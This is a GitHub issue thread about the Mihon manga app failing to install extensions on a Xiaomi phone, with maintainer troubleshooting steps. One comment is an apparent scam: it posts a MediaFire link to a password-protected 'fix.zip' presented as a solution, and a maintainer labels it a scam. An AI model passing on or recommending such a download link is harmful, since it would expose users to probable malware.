### ISSUE TITLE
Source non installé

### ISSUE THREAD

**Issue by Valha4** [mihonapp/mihon#1171]
### Steps to reproduce

Quand j'essaie d'installer l'une des source, le message d'erreur suivant capture ci-dessous se montre.

### Expected behavior

Source bien installé 

### Actual behavior

Mihon a rencontré une erreur inattendu. Nous vous suggérons de nous partager les rapports de plantage dans notre salon d'assistance sur Discord

### Crash logs

![Screenshot_2024-08-28-13-03-31-009_app mihon](https://github.com/user-attachments/assets/aed8a56e-6c13-459a-8190-ed9fc4bbf097)

### Mihon version

0.16.5

### Android version

Android 11 - MUIU Global 12.5. stable

### Device

Redmi note 11 4G

### Other details

![Screenshot_2024-08-28-13-03-31-009_app mihon](https://github.com/user-attachments/assets/3e54425d-9408-471c-b667-184064b55980)

### Acknowledgements

- [X] I have searched the existing issues and this is a new ticket, **NOT** a duplicate or related to another open or closed issue.
- [X] I have written a short but informative title.
- [X] I have gone through the [FAQ](https://mihon.app/docs/faq/general) and [troubleshooting guide](https://mihon.app/docs/guides/troubleshooting/).
- [X] I have updated the app to version **[0.16.5](https://github.com/mihonapp/mihon/releases/latest)**.
- [X] I have updated all installed extensions.
- [X] I will fill out all of the requested information in this form.

**Comment by chenkeyu123** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by Smol-Ame** [comment]
Do not download the above, it is a scam

**Comment by Smol-Ame** [comment]
This seems like the usual Xiaomi extension installation issue, here's a couple things to try:

* Go to your Phone Settings > Developer Options, __turn off system optimization/MIUI Optimization__
> If you don't see this setting, scroll down your Developer Options, and tap multiple times on "Reset to default values" until it appears
* Make sure your Mihon app has permission to "Install Unknown Apps"
* Try downloading said extension now

If that doesn't work:
* Go to Mihon Settings > Advanced, and change the Installer to something else (other than Shizuku)
* Try downloading said extension now

If you have any other questions, please check with whoever maintains your extensions or ask about this crash in the Mihon Discord support channel.

**Comment by Smol-Ame** [comment]
Closing as chinaphone issue

Follow the instructions in my previous message, otherwise, join the Mihon Discord support channel for more troubleshooting if the above doesn't help.
